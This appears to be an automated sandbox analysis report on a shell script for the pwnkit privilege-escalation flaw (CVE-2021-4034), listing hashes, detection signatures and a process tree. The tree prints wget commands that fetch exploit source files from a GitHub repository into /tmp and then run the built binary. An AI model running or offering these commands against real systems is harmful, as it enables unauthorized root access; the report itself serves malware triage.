Analysis

  • max time kernel
    6s
  • max time network
    9s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20231020-en
  • resource tags

    arch:mips
    image:debian9-mipsbe-20231020-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    23/10/2023, 23:31

General

  • Target

    CVE-2021-4034/cve-2021-4034.sh

  • Size

    305B

  • MD5

    151fcb01bcb58f6836dc4de76bc9672d

  • SHA1

    636089fa2cace9cc33f482d348e9de8cb5cfc571

  • SHA256

    a3c982eff2948f3dfbe97bdf3d631f8bb82c78e231b5f5978e4ef370fdc52174

  • SHA512

    929aaa36bdfa0a3db995f2391f5879cbef50ed79fbea72838e1306b0a7dbb90633e2b69a97b93687a2fa3880831a2af59b06c2db0e2f9ffc1e1ece9ce6896c83

Score
6/10

Malware Config

Signatures

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/CVE-2021-4034/cve-2021-4034.sh
    /tmp/CVE-2021-4034/cve-2021-4034.sh
    1⤵
      PID:340
    • /usr/local/sbin/sh
      sh /tmp/CVE-2021-4034/cve-2021-4034.sh
      1⤵
        PID:340
      • /usr/local/bin/sh
        sh /tmp/CVE-2021-4034/cve-2021-4034.sh
        1⤵
          PID:340
        • /usr/sbin/sh
          sh /tmp/CVE-2021-4034/cve-2021-4034.sh
          1⤵
            PID:340
          • /usr/bin/sh
            sh /tmp/CVE-2021-4034/cve-2021-4034.sh
            1⤵
              PID:340
            • /sbin/sh
              sh /tmp/CVE-2021-4034/cve-2021-4034.sh
              1⤵
                PID:340
              • /bin/sh
                sh /tmp/CVE-2021-4034/cve-2021-4034.sh
                1⤵
                  PID:340
                  • /usr/bin/wget
                    wget --no-hsts -q https://raw.githubusercontent.com/berdav/CVE-2021-4034/main//cve-2021-4034.c -O cve-2021-4034.c
                    2⤵
                    • Writes file to tmp directory
                    PID:344
                  • /usr/bin/wget
                    wget --no-hsts -q https://raw.githubusercontent.com/berdav/CVE-2021-4034/main//pwnkit.c -O pwnkit.c
                    2⤵
                    • Writes file to tmp directory
                    PID:358
                  • /usr/bin/wget
                    wget --no-hsts -q https://raw.githubusercontent.com/berdav/CVE-2021-4034/main//Makefile -O Makefile
                    2⤵
                    • Writes file to tmp directory
                    PID:363
                  • /tmp/CVE-2021-4034/cve-2021-4034
                    ./cve-2021-4034
                    2⤵
                      PID:365

Network

MITRE ATT&CK Enterprise v15
